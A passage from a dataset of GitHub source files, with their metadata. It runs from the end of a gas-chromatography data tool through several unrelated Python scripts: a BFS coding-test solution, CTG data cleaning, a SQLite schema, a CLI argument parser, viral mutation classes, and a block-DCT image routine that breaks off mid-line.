samples[i][count] == 'R2': # bold R2 and create row for volumn, temp, area reporting and flux formula\n worksheet.write_row(row, 0, samples[i][1:] + [''], flux_format[data_format_num])\n sample_row = samples[i][1:-6]\n row += 1\n\n # self reporting row for volume, temp and surface area\n worksheet.write_row(row, 0, sample_row + ['Volume: ', 1, 'Temp: ', 1, 'Surface Area:', 1, ''], flux_format[data_format_num])\n row += 1\n\n # CH4 flux excel formula builder\n CH4_flux = '=({}{}*({}{}/(0.0821*{}{}))*(0.016*1440)/({}{})*(12/16)/1000)'.format(\n column_number_map[count + 1], row - 2,\n column_number_map[count + 1], row,\n column_number_map[count + 3], row,\n column_number_map[count + 5], row)\n\n # CO2 flux excel formula builder\n CO2_flux = '=({}{}*({}{}/(0.0821*{}{}))*(0.044*1440)/({}{})*(12/44)/1000)'.format(\n column_number_map[count + 2], row - 2,\n column_number_map[count + 1], row,\n column_number_map[count + 3], row,\n column_number_map[count + 5], row)\n\n # write row with flux formulas\n worksheet.write_row(row, 0, sample_row + [\"Flux\", CH4_flux, CO2_flux, '', '', '', ''], flux_format[data_format_num])\n \n else: # regular data output\n worksheet.write_row(row, 0, samples[i][1:], data_format[data_format_num])\n row += 1\n workbook.close()\n return out\n\n\n#########################################################################################################################\n######################################## script execution starts here! 
##################################################\n#########################################################################################################################\n\n\ndef GC():\n sample_rows = {}\n samples = {}\n standards = {}\n\n # GC form layout\n layout = [[sg.Text('GC Data Processing Tool', font='Any 36', background_color='#0680BF')],\n [sg.Text(\"\", background_color='#0680BF')],\n [sg.Text('PDF files folder:', size=(15, 1), background_color='#0680BF'), sg.Input(key='-FOLDER-'), sg.FolderBrowse()],\n [sg.Text('Naming regex:', size=(15, 1), background_color='#0680BF'), sg.InputText(key='-REGEX-')],\n [sg.Text('Columns', size=(15, 1), background_color='#0680BF'), sg.InputText(key='-COLS-')],\n [sg.Text('Standards', size=(15, 1), background_color='#0680BF'), sg.InputText(key='-STANDARDS-')],\n [sg.Checkbox(\"Calculate flux?\", key=\"-FLUX-\", background_color='#0680BF', enable_events=True)],\n [sg.Text(\"\", background_color='#0680BF')],\n [sg.Submit(), sg.Cancel()]]\n\n # Create the window\n window = sg.Window(\"GC\", layout, margins=(80, 50), background_color='#0680BF')\n cancelled = False\n\n # Create an event loop\n while True:\n event, values = window.read()\n # End program if user closes window or\n # presses the OK button\n if event == \"Submit\":\n break\n \n elif event == \"Cancel\" or event == sg.WIN_CLOSED:\n cancelled = True\n break\n \n # kill it if canceled\n if cancelled == False:\n\n try:\n print(\"Reading files\")\n folder = values['-FOLDER-']\n\n # get PDFs\n PDFs = get_PDFs(folder)\n\n if len(PDFs) == 0:\n raise Exception(\"Error: No PDFs found at selected location\")\n BAR_MAX = len(PDFs)\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise Exception(\"Error in inputted information\")\n\n try:\n # process input regex\n regex, count = process_regex(values['-REGEX-'])\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise Exception(\"Error in inputted naming regex\")\n\n try:\n # get different standards\n stans = values['-STANDARDS-'].split(',')\n for stan in stans:\n stan = stan.strip(' \\t\\n\\r')\n standards[stan] = {'Methane': [], 'Carbon Dioxide': [], 'Oxygen': [], 'Nitrogen': [], 'Nitrous Oxide': [], 'File': []}\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise Exception(\"Error in inputted standards\")\n\n try:\n # get columns\n columns = values['-COLS-'].split(', ')\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise Exception(\"Error in inputted columns\")\n\n # progress bar layout\n layout = [[sg.Text('GC Data Processing Tool', font='Any 36', background_color='#0680BF')],\n [sg.Text(\"Processing... 
This may take a few minutes\", background_color='#0680BF')],\n [sg.Text(\"\", background_color='#0680BF')],\n [sg.ProgressBar(BAR_MAX, orientation='h', size=(40, 15), key='-PROG-', bar_color=('#38E210', '#FFFFFF'))]]\n window.close()\n window = sg.Window(\"GC\", layout, margins = (80, 50), background_color='#0680BF')\n \n try:\n # process PDFs\n print(\"Processing PDFs\")\n samples, standards, sample_rows, longest_file_name, dates = process_PDFs(samples, standards, sample_rows, PDFs, window, regex, count)\n print(samples)\n\n # calculate flux if ticked\n if values['-FLUX-']:\n flux(samples, count)\n\n # flatten sample dictionary\n samples = flatten(samples)\n for row in samples:\n print(row)\n print(samples)\n\n print(\"Outputting results\")\n # output data to excel file\n out = output_data(samples, standards, longest_file_name, columns, dates, count)\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise e\n \n window.close()\n return 0\n\n\nif __name__ == \"__main__\":\n\n os.system('cls' if os.name == 'nt' else 'clear')\n print(\"================================================================================\")\n print(\"============================ GC data processing tool ===========================\")\n print(\"================================================================================\\n\") \n\n sample_rows = {}\n samples = {}\n standards = {}\n\n root = tkinter.Tk()\n root.withdraw()\n print(\"Choose PDF files folder:\")\n folder = tkinter.filedialog.askdirectory(title = \"Choose folder\")\n regex = input(\"Enter a regex: \")\n columns = input(\"Enter columns: \").split(', ')\n standards = input(\"Enter standards\").split(', ')\n calculate_flux = ''\n while calculate_flux.lower() != 'n' and calculate_flux.lower() != 'y':\n calculate_flux = input(\"Calculate flux? 
(y/n)\")\n\n\n PDFs = get_PDFs(folder)\n regex, count = process_regex(regex)\n samples, standards, sample_rows, longest_file_name, dates = process_PDFs(samples, standards, sample_rows, PDFs, False, regex, count)\n if calculate_flux == 'y':\n flux(samples, count)\n samples = flatten(samples)\n out = output_data(samples, standards, longest_file_name, columns, dates, count)\n","repo_name":"BrianNewton/PEDRO","sub_path":"GC.py","file_name":"GC.py","file_ext":"py","file_size_in_byte":20397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"19001712343","text":"from collections import deque\nimport sys\nf_input = sys.stdin.readline\n\nN = int(f_input())\nmap_info = list()\nmin_height = 100\nmax_height = 1\nfor _ in range(N):\n row = list(map(int, f_input().split()))\n map_info.append(row)\n for r in row:\n if max_height < r:\n max_height = r\n if min_height > r:\n min_height = r\n\ndy = [-1, 0, 1, 0]\ndx = [0, 1, 0, -1]\n\nmax_s_zone = 0\ns_zone = 0\nfor wl in range(min_height - 1, max_height):\n # wl(water level) 보다 높은 수위의 영역이 BFS 탐색 대상이 된다.\n visited = [[0] * N for _ in range(N)]\n queue = deque()\n s_zone = 0\n for r in range(N):\n for c in range(N):\n if map_info[r][c] > wl and visited[r][c] == 0:\n s_zone += 1\n queue.append((r, c))\n visited[r][c] = 1\n while queue:\n cr, cc = queue.popleft()\n for d in range(4):\n nr = cr + dy[d]\n nc = cc + dx[d]\n if 0 <= nr < N and 0 <= nc < N:\n if map_info[nr][nc] > wl and visited[nr][nc] == 0:\n queue.append((nr, nc))\n visited[nr][nc] = 1\n if s_zone > max_s_zone:\n max_s_zone = s_zone\n\nprint(max_s_zone)\n\n","repo_name":"ku-kim/Coding-Test-Study","sub_path":"Submit/dave/DFS_BFS/안전영역/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"70294243722","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 17:14:23 2019\n\n@author: smorandv\n\"\"\"\nimport numpy as np\nimport pandas as pd\n\n\ndef rm_ext_and_nan(CTG_features, extra_feature):\n \n \"\"\"\n :param CTG_features: Pandas series of CTG features\n :param extra_feature: A feature to be removed\n :return: A dictionary of clean CTG called c_ctg\n \"\"\"\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n c_ctg = CTG_features.apply(lambda col:pd.to_numeric(col,errors='coerce')).dropna().drop(\"{}\".format(extra_feature),1)\n # -------------------------------------------------------------------------\n\n return c_ctg\n\n\ndef nan2num_cdf(CTG_features, extra_feature):\n \"\"\"\n\n :param CTG_features: Pandas series of CTG features\n :param extra_feature: A feature to be removed\n :return: A pandas dataframe of the dictionary c_cdf containing the \"clean\" features\n \"\"\"\n c_cdf = {}\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n \n c_run = CTG_features.apply(lambda col:pd.to_numeric(col,errors='coerce')).drop(\"{}\".format(extra_feature),1)\n c_run = c_run.drop(c_run.index[0])\n temp = rm_ext_and_nan(CTG_features, extra_feature)\n \n for c in temp.keys() :\n cdf = np.cumsum(temp[c])/ np.sum(temp[c])\n sort_temp = temp[c].sort_values(ascending=True)\n num_of_nan = c_run[c].isnull().sum()\n rand_vec = np.random.uniform(0,1,num_of_nan)\n sampeled_vec = []\n j=0\n \n \n for i in range(num_of_nan):\n for k in range(cdf.shape[0]-1):\n if( (rand_vec[i] <= cdf.values[k+1]) & (rand_vec[i] >= cdf.values[k])):\n 
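# --- Editor's note (hedged sketch): the stdin-driven flood fill in solution.py
# above, repackaged as a pure function so it can be unit-tested; same BFS and
# same O(height_range * N^2) behaviour, the function name is illustrative.
from collections import deque

def max_safe_zones(grid):
    n = len(grid)
    lo, hi = min(map(min, grid)), max(map(max, grid))
    best = 0
    for wl in range(lo - 1, hi):                      # wl = candidate water level
        seen = [[False] * n for _ in range(n)]
        zones = 0
        for r in range(n):
            for c in range(n):
                if grid[r][c] > wl and not seen[r][c]:
                    zones += 1
                    queue = deque([(r, c)])
                    seen[r][c] = True
                    while queue:
                        cr, cc = queue.popleft()
                        for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):
                            nr, nc = cr + dr, cc + dc
                            if 0 <= nr < n and 0 <= nc < n and grid[nr][nc] > wl and not seen[nr][nc]:
                                seen[nr][nc] = True
                                queue.append((nr, nc))
        best = max(best, zones)
    return best

# max_safe_zones([[1, 2], [2, 1]]) == 2  (at water level 1 the two peaks split)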
sampeled_vec.append(sort_temp.values[k])\n break\n \n \n for row in range(c_run.shape[0]):\n if(np.isnan(c_run[c].values[row])):\n c_run[c].values[row] = sampeled_vec[j]\n j=j+1\n if(j==num_of_nan):\n break\n \n c_cdf.update({c:c_run[c]})\n # -------------------------------------------------------------------------\n return pd.DataFrame(c_cdf)\n\n\ndef sum_stat(c_feat):\n \"\"\"\n\n :param c_feat: Output of nan2num_cdf\n :return: Summary statistics as a dicionary of dictionaries (called d_summary) as explained in the notebook\n \"\"\"\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n d_summary={}\n for c in c_feat.keys():\n minimum = c_feat[c].min()\n quar = c_feat[c].quantile(0.25)\n med = c_feat[c].median()\n tri_quart=c_feat[c].quantile(0.75)\n maximum = c_feat[c].max()\n new ={\"min\":minimum,\"Q1\":quar,\"median\":med,\"Q3\":tri_quart,\"max\":maximum}\n d_summary.update({c:new})\n # -------------------------------------------------------------------------\n return d_summary\n\n\ndef rm_outlier(c_feat, d_summary):\n \"\"\"\n\n :param c_feat: Output of nan2num_cdf\n :param d_summary: Output of sum_stat\n :return: Dataframe of the dictionary c_no_outlier containing the feature with the outliers removed\n \"\"\"\n c_no_outlier = {}\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n for c in c_feat.keys() :\n iqr = d_summary[c]['Q3']-d_summary[c]['Q1']\n upper = d_summary[c]['Q3']+ iqr * 1.5\n lower = d_summary[c]['Q1']- iqr * 1.5\n c_feat_coll = c_feat[c]\n new = c_feat_coll[(c_feat_coll <= upper) & (c_feat_coll >= lower)]\n c_no_outlier.update({c:new})\n\n # -------------------------------------------------------------------------\n return pd.DataFrame(c_no_outlier)\n\n\ndef phys_prior(c_cdf, feature, thresh):\n \"\"\"\n\n :param c_cdf: Output of nan2num_cdf\n :param feature: A string of your selected feature\n :param thresh: A numeric value of threshold\n :return: An array of the \"filtered\" feature called filt_feature\n \"\"\"\n # ------------------ IMPLEMENT YOUR CODE HERE:-----------------------------\n \n filt_feature = c_cdf[feature]\n filt_feature = np.array(filt_feature[filt_feature <= thresh])\n # -------------------------------------------------------------------------\n return filt_feature\n\n\ndef norm_standard(CTG_features, selected_feat=('LB', 'ASTV'), mode='none', flag=False):\n \"\"\"\n\n :param CTG_features: Pandas series of CTG features\n :param selected_feat: A two elements tuple of strings of the features for comparison\n :param mode: A string determining the mode according to the notebook\n :param flag: A boolean determining whether or not plot a histogram\n :return: Dataframe of the normalized/standardazied features called nsd_res\n \"\"\"\n x, y = selected_feat\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n nsd_res = CTG_features.copy()\n \n if(mode == 'standard'):\n for i in nsd_res.keys():\n nsd_res[i]=(nsd_res[i]- nsd_res[i].median())/nsd_res[i].std()\n \n if(mode == 'MinMax'):\n for i in nsd_res.keys():\n nsd_res[i] = (nsd_res[i]-nsd_res[i].min())/(nsd_res[i].max()-nsd_res[i].min())\n \n if(mode == 'mean'):\n for i in nsd_res.keys():\n nsd_res[i] = (nsd_res[i]-nsd_res[i].mean())/(nsd_res[i].max()-nsd_res[i].min())\n \n if(flag == True):\n import matplotlib.pyplot as plt\n plt.hist(nsd_res[x], bins=80,label=x)\n plt.hist(nsd_res[y], bins=80,label=y)\n plt.ylabel('Frequency')\n plt.xlabel('Values')\n plt.legend(loc='upper right')\n plt.show() \n # 
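# --- Editor's note (hedged sketch): the nested inverse-CDF loop in nan2num_cdf
# above can be replaced by a single vectorised draw from the observed values,
# which is the usual empirical-CDF sampling (note the original cumsums the
# values themselves rather than their counts, so this matches the common intent
# rather than that exact arithmetic); `observed` and `n_missing` are
# illustrative names, not part of the original module.
import numpy as np

def sample_from_empirical(observed, n_missing, seed=None):
    rng = np.random.default_rng(seed)
    # drawing uniformly with replacement from the clean column realises its empirical CDF
    return rng.choice(np.asarray(observed), size=n_missing, replace=True)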
-------------------------------------------------------------------------\n return pd.DataFrame(nsd_res)\n","repo_name":"mlh-master/hw1_mlh-naama-daniel","sub_path":"HW1-master/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36168450371","text":"## auxiliary tools to transform python files from 2.x to 3.x, when deploying old 2.x projects.\n## Author: XZhou, 19th April 2018\n\n# encoding: UTF-8\nimport re\n\nInputFile = r'F:\\PythonSpace\\ReansformPyfileFrom2xTo3x_example.py'\nOutputFile = InputFile+'.py3x'\n\n## First Step, update the function of print\nprint('start to replace \"print xxx\" by \"print (xxx)\"!')\nwith open(OutputFile, 'w') as ofd:\n with open(InputFile) as fd:\n while 1:\n line = fd.readline()\n if not line:\n break\n if re.match(r'^[ ]*print[ ]+.*', line):\n if not re.search('^[ ]*print[ ]*\\(.*\\)$', line):\n splitlines = re.split(r'^([ ]*print[ ]+)(.*)([ ]*)$', line)\n ofd.write(splitlines[1]+'('+splitlines[2]+splitlines[3]+')' + '\\n')\n else:\n ofd.write(line)\n else:\n ofd.write(line)\n","repo_name":"serieslover/auxiliary-tools-for-python","sub_path":"TransformPyfileFrom2xTo3x.py","file_name":"TransformPyfileFrom2xTo3x.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4232789279","text":"import sqlite3\nimport sys\nimport os\n\ncurpath = os.path.dirname(__file__)\nif(curpath not in sys.path):\n sys.path.append(curpath)\n\ndbPath = 'data.db'\n\nconn = sqlite3.connect(dbPath)\n\ningTable = ('CREATE TABLE IF NOT EXISTS ingredients( '\n ' id integer primary key autoincrement not null, '\n ' name varchar(255) unique not null, '\n ' jar_pos integer unique ,'\n ' mixer integer default 0'\n ');')\n\nconn.execute(ingTable)\n\ndrinkTable = ('CREATE TABLE IF NOT EXISTS drinks( '\n ' id integer primary key autoincrement not null, '\n ' name varchar(255) unique not null, '\n ' image varchar(255), '\n ' notes TEXT'\n ');')\n\nconn.execute(drinkTable)\n\ndrinkIngTable = ('CREATE TABLE IF NOT EXISTS drink_ingredient( '\n ' drink_id integer not null, '\n ' ingredient_id integer not null, '\n ' oz real not null,'\n ' FOREIGN KEY(drink_id) REFERENCES drinks(id) ON DELETE CASCADE, '\n ' FOREIGN KEY(ingredient_id) REFERENCES ingredients(id) ON DELETE CASCADE '\n ');')\n\nconn.execute(drinkIngTable)\n\nconn.commit()\nconn.close()\n","repo_name":"Just-The-Chip/cocktail_control","sub_path":"setupdb.py","file_name":"setupdb.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"18591912522","text":"import logging\nimport sys\n\nfrom ._typing import Any, Dict, List, Optional, Tuple\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef parse_command_line_arguments():\n # type: () -> Optional[Dict[str, Any]]\n if len(sys.argv) > 1:\n try:\n return _parse_cmd_args(sys.argv[1:])\n\n except ValueError:\n LOGGER.debug(\"Failed to parse argv values. 
Fallback to naive parsing.\")\n return _parse_cmd_args_naive(sys.argv[1:])\n\n\ndef _parse_cmd_args_naive(to_parse):\n # type: (List[Any]) -> Optional[Dict[str, Any]]\n vals = {}\n if len(to_parse) > 1:\n for i, arg in enumerate(to_parse):\n vals[\"run_arg_%s\" % i] = str(arg)\n\n return vals\n\n\ndef _parse_cmd_args(argv_vals):\n # type: (List[Any]) -> Optional[Dict[str, Any]]\n \"\"\"\n Parses the value of argv[1:] to a dictionary of param,value. Expects params name to start with a - or --\n and value to follow. If no value follows that param is considered to be a boolean param set to true.(e.g --test)\n Args:\n argv_vals: The sys.argv[] list without the first index (script name). Basically sys.argv[1:]\n\n Returns: Dictionary of param_names, param_values\n\n \"\"\"\n results = {}\n\n split_argv_vals = []\n for word in argv_vals:\n if word == \"--\":\n continue # skip it\n elif \"=\" in word:\n key, value = _parse_arg_value_with_equal(word)\n results[key] = value\n else:\n split_argv_vals.append(word)\n\n current_key = None\n for word in split_argv_vals:\n word = word.strip()\n\n if word[0] == \"-\":\n prefix = 1\n if len(word) > 1 and word[1] == \"-\":\n prefix = 2\n\n if current_key is not None:\n # if we found a new key but haven't found a value to the previous\n # key it must have been a boolean argument.\n results[current_key] = True\n\n current_key = word[prefix:]\n\n else:\n word = word.strip()\n if current_key is None:\n # we failed to parse the string. We think this is a value, but we don't know what's the key.\n # fallback to naive parsing.\n raise ValueError(\"Failed to parse argv arguments\")\n\n else:\n word = _guess_type(word)\n results[current_key] = word\n current_key = None\n\n if current_key is not None:\n # last key was a boolean\n results[current_key] = True\n\n return results\n\n\ndef _parse_arg_value_with_equal(arg_val):\n # type: (str) -> Tuple[str, str]\n values = arg_val.split(\"=\", 1)\n key = values[0]\n while key[0] == \"-\":\n key = key.replace(\"-\", \"\", 1)\n\n return key.strip(), _guess_type(values[1].strip())\n\n\ndef _guess_type(s):\n import ast\n\n try:\n return ast.literal_eval(s)\n\n except (ValueError, SyntaxError):\n return str(s)\n","repo_name":"kchaehyeon01/AI_HaniumAdvDef","sub_path":"models/Def_DiffPure/source1 _ labml _ comet/comet_ml/comet_ml/cli_args_parse.py","file_name":"cli_args_parse.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"44940102057","text":"import json\nimport typing\n\n\nclass ProteinMutationIdentifier:\n\n def __init__(self, gene:str, ref:str, position:[str, int], alt:str, note:str=\"\", source:str=\"\"):\n self.gene = gene\n self.position = str(position)\n self.ref = ref\n if not ref:\n self.ref = \"-\"\n self.alt = alt\n if not alt:\n self.alt = \"-\"\n self.note = note\n self.source = source\n\n @property\n def proteinChangeNotation(self):\n if self.ref == \"-\":\n return \"%s:ins%s %s\" % (self.gene, self.position, self.alt)\n elif self.alt == \"-\":\n return \"%s:del%s %s\" % (self.gene, self.position, self.ref)\n else:\n return \"%s:%s%s%s\" % (self.gene, self.ref, self.position, self.alt)\n\n @property\n def dictionary(self):\n dictionary = {\n \"gene\": self.gene,\n \"position\": self.position,\n \"ref\": self.ref,\n \"alt\": self.alt,\n \"note\": self.note,\n \"source\": self.source\n }\n return dictionary\n\n @property\n def json(self):\n return json.dumps(self.dictionary, indent=4)\n\n @classmethod\n def 
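# --- Editor's note: an illustration of the flag grammar _parse_cmd_args above
# accepts (key=value pairs are split off first, -/-- flags take the next token
# as a literal-evaluated value, trailing bare flags become booleans):
#   _parse_cmd_args(["--lr", "0.1", "--debug", "epochs=5"])
#   -> {"epochs": 5, "lr": 0.1, "debug": True}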
fromDict(cls, dictionary:dict):\n return cls(**dictionary)\n\n @classmethod\n def fromJSON(cls, jsonString:str):\n return cls.fromDict(json.loads(jsonString))\n\n @classmethod\n def fromString(cls, string, note:str=\"\", source:str=\"\"):\n string = string.strip()\n try:\n gene, change = string.split(\":\")\n change = change.strip()\n except ValueError:\n raise ValueError(\"Protein change notation should be Gene:change with only one colon character. That was not the number detected in %s.\" %string)\n if \"ins\" in change:\n ref = \"-\"\n change = change.replace(\"ins\", \"\")\n try:\n pos, alt = change.split()\n except ValueError:\n raise ValueError(\"Protein insertion notation should be gene:ins[position] [sequence]. That notation was not parsed in %s\" %string)\n elif \"del\" in change:\n alt = \"-\"\n change = change.replace(\"del\", \"\")\n try:\n pos, ref = change.split()\n except ValueError:\n raise ValueError(\"Protein deletion notation should be gene:ins[position] [sequence]. That notation was not parsed in %s\" %string)\n else:\n ref = change[0]\n alt = change[-1]\n pos = change[1:-1]\n try:\n pos = int(pos)\n except ValueError:\n raise ValueError(\"Protein substitution notation should be gene:[ref][position][alt] (such as S:D614G), but that format was not parsed from %s\" %string)\n return cls(gene, ref, pos, alt, note, source)\n\n def __str__(self):\n return \"%s_%s_%s_%s\" %(self.gene, self.position, self.ref, self.alt)\n\n def __hash__(self):\n return hash(str(self))\n\n def __eq__(self, other):\n return self.gene == other.gene and self.position == other.position and self.ref == other.ref and self.alt == other.alt\n\n def __gt__(self, other):\n if self == other:\n return False\n if self.gene > other.gene:\n return True\n elif self.gene < other.gene:\n return False\n else:\n if self.position > other.position:\n return True\n elif self.position < other.position:\n return False\n else:\n if self.ref > other.ref:\n return True\n elif self.ref < other.ref:\n return False\n else:\n if self.alt > other.alt:\n return True\n elif self.alt < other.alt:\n return False\n else:\n raise ValueError(\"Should never be able to reach this point. 
Did so comparing greater than for %s and %s\" %(self, other))\n\n def __lt__(self, other):\n return not (self > other or self == other)\n\n def __le__(self, other):\n return self < other or self == other\n\n def __ge__(self, other):\n return self > other or self == other\n\n\n\nclass NucleicAcidMutationIdentifier:\n\n def __init__(self, contig:str, position:[str, int], ref:str, alt:str, note:str=\"\", source:str=\"\"):\n self.contig = contig\n self.position = str(position)\n self.ref = ref\n self.alt = alt\n self.note = note\n self.source = source\n\n @property\n def vepIdentifier(self):\n return \"%s_%s_%s/%s\" % (self.contig, self.position, self.ref, self.alt)\n\n @property\n def dictionary(self):\n dictionary = {\n \"contig\": self.contig,\n \"position\": self.position,\n \"ref\": self.ref,\n \"alt\": self.alt,\n \"note\": self.note,\n \"source\": self.source\n }\n return dictionary\n\n @property\n def json(self):\n return json.dumps(self.dictionary, indent=4)\n\n @classmethod\n def fromDict(cls, dictionary: dict):\n return cls(**dictionary)\n\n @classmethod\n def fromJSON(cls, jsonString: str):\n return cls.fromDict(json.loads(jsonString))\n\n @classmethod\n def fromVEPString(cls, vepString:str, note:str=\"\", source:str=\"\"):\n identifierSplit = vepString.split(\"_\")\n if not len(identifierSplit) >= 3:\n raise ValueError(\"VEP identifiers should be at least three fields\")\n variation = identifierSplit[-1]\n position = int(identifierSplit[-2])\n contig = \"_\".join(identifierSplit[:-2])\n ref, alt = variation.split(\"/\")[:2]\n return cls(contig, position, ref, alt, note, source)\n\n def __str__(self):\n return \"%s_%s_%s_%s\" % (self.contig, self.position, self.ref, self.alt)\n\n def __hash__(self):\n return hash(str(self))\n\n def __eq__(self, other):\n return self.contig == other.contig and self.position == other.position and self.ref == other.ref and self.alt == other.alt\n\n def __gt__(self, other):\n if self == other:\n return False\n if self.contig > other.gene:\n return True\n elif self.contig < other.gene:\n return False\n else:\n if self.position > other.position:\n return True\n elif self.position < other.position:\n return False\n else:\n if self.ref > other.ref:\n return True\n elif self.ref < other.ref:\n return False\n else:\n if self.alt > other.alt:\n return True\n elif self.alt < other.alt:\n return False\n else:\n raise ValueError(\n \"Should never be able to reach this point. 
Did so comparing greater than for %s and %s\" % (\n self, other))\n\n def __lt__(self, other):\n return not (self > other or self == other)\n\n def __le__(self, other):\n return self < other or self == other\n\n def __ge__(self, other):\n return self > other or self == other\n\n\nclass MutationIdentifier:\n\n def __init__(self, proteinChange:[str, ProteinMutationIdentifier]=None, nucleicAcidChange:[str, NucleicAcidMutationIdentifier]=None, notes:str=\"\", source:str=\"\"):\n if not proteinChange and not nucleicAcidChange:\n raise ValueError(\"Unable to create a mutation data set with no mutation data associated.\")\n if type(proteinChange) == str:\n proteinChange = ProteinMutationIdentifier.fromString(proteinChange)\n self.proteinChange = proteinChange\n if type(nucleicAcidChange) == str:\n nucleicAcidChange = NucleicAcidMutationIdentifier.fromVEPString(nucleicAcidChange)\n self.nucleicAcidChange = nucleicAcidChange\n self.notes = notes\n self.source = source\n\n @property\n def dictionary(self):\n proteinDict = None\n if self.proteinChange:\n proteinDict = self.proteinChange.dictionary\n nucleicAcidDict = None\n if self.nucleicAcidChange:\n nucleicAcidDict = self.nucleicAcidChange.dictionary\n returnDict = {\n \"protein\": proteinDict,\n \"nucleic acid\": nucleicAcidDict,\n \"notes\": self.notes,\n \"source\": self.source\n }\n return returnDict\n\n @classmethod\n def fromDict(cls, dictionary:dict):\n if not dictionary[\"protein\"]:\n proteinChange = None\n else:\n proteinChange = ProteinMutationIdentifier.fromDict(dictionary[\"protein\"])\n if not dictionary[\"nucleic acid\"]:\n nucleicAcidChange = None\n else:\n nucleicAcidChange = NucleicAcidMutationIdentifier.fromDict(dictionary[\"nucleic acid\"])\n source = dictionary[\"source\"]\n notes = dictionary[\"notes\"]\n return cls(proteinChange, nucleicAcidChange, notes, source)\n\n def __eq__(self, other):\n if self.nucleicAcidChange and other.nucleicAcidChange:\n return self.nucleicAcidChange == other.nucleicAcidChange\n elif self.proteinChange and other.proteinChange:\n return self.proteinChange == other.proteinChange\n\n\nclass StrainIdentifier:\n\n def __init__(self, identifier: str, commonName: str, location: str, aliases: list, mutations:typing.List[MutationIdentifier], source:str=\"\", notes:str=\"\"):\n self.identifier = identifier\n self.commonName = commonName\n self.location = location\n self.aliases = aliases\n self.source = source\n self.notes = notes\n self.mutationList = mutations\n self.nucleotideMutations, self.proteinMutations = self.makeMutationDictionaries(mutations)\n\n @staticmethod\n def makeMutationDictionaries(mutations: typing.List[MutationIdentifier]):\n nucleotideMutations = {}\n proteinMutations = {}\n for mutation in mutations:\n if mutation.proteinChange:\n gene = mutation.proteinChange.gene\n if not gene in proteinMutations:\n proteinMutations[gene] = []\n proteinMutations[gene].append(mutation)\n if mutation.nucleicAcidChange:\n contig = mutation.nucleicAcidChange.contig\n if not contig in nucleotideMutations:\n nucleotideMutations[contig] = {}\n position = mutation.nucleicAcidChange.position\n if not position in nucleotideMutations[contig]:\n nucleotideMutations[contig][position] = []\n nucleotideMutations[contig][position].append(mutation)\n return nucleotideMutations, proteinMutations\n\n @property\n def dictionary(self):\n mutationList = [mutation.dictionary for mutation in self.mutationList]\n dictionary = {\n \"identifier\": self.identifier,\n \"common name\": self.commonName,\n \"location\": 
self.location,\n \"aliases\": self.aliases,\n \"mutations\": mutationList,\n \"source\": self.source,\n \"notes\": self.notes\n }\n return dictionary\n\n @property\n def json(self):\n return json.dumps(self.dictionary, indent=4)\n\n @classmethod\n def fromDict(cls, dictionary: dict):\n mutationList = []\n for mutationDict in dictionary[\"mutations\"]:\n mutationList.append(MutationIdentifier.fromDict(mutationDict))\n return cls(\n dictionary[\"identifier\"],\n dictionary[\"common name\"],\n dictionary[\"location\"],\n dictionary[\"aliases\"],\n mutationList,\n dictionary[\"source\"],\n dictionary[\"notes\"]\n )\n\n @classmethod\n def fromJSON(cls, jsonString: str):\n dictionary = json.loads(jsonString)\n return cls.fromDict(dictionary)\n","repo_name":"Zymo-Research/VirSieveVEP","sub_path":"cvaSupport/viralVariantHandler.py","file_name":"viralVariantHandler.py","file_ext":"py","file_size_in_byte":12017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18491177244","text":"import numpy as np\nfrom scipy import fftpack\n\ndef all_blocks(im, bsize):\n # Give an image of size H*W\n # return an array of size (H-bsize+1)*(W-bsize+1)*bsize*bsize\n # which are the blocks corresponding to their left-upper corners\n H, W = im.shape\n nb_y = H - bsize + 1\n nb_x = W - bsize + 1\n shifts = []\n for i in range(bsize):\n for j in range(bsize):\n shifts.append(im[i:i + nb_y, j:j + nb_x])\n blocks = np.stack(shifts, -1)\n blocks = np.reshape(blocks, [H - bsize + 1, W - bsize + 1, bsize, bsize])\n return blocks\n\n\ndef dct(arr, axes=None, inverse=False):\n if axes is None:\n axes = list(range(len(arr.shape)))\n if isinstance(axes, int):\n axes = [axes]\n for axis in axes:\n if inverse:\n arr = fftpack.idct(arr, axis=axis, norm='ortho')\n else:\n arr = fftpack.dct(arr, axis=axis, norm='ortho')\n return arr\n\n\ndef hard_thr(arr, thr):\n arr = arr.copy()\n arr[np.abs(arr) < thr] = 0.\n return arr\n\n\ndef block_dct(im, bsize, inverse=False):\n # Compute dct for all overlapping blocks in an image\n blocks = all_blocks(im, bsize)\n blocks = dct(blocks, axes=[2, 3], inverse=inverse)\n return blocks\n\n\ndef group(ref_block, neighborhood, thr, limit):\n # ref_block is bsize*bsize\n # neighborhood is nsize*nsize*bsize*bsize\n ref_block = ref_block[np.newaxis, np.newaxis, ...]\n d = np.mean(np.square(ref_block - neighborhood), axis=(2, 3))\n mask = d <= thr\n idx_y, idx_x = np.where(mask)\n grp = 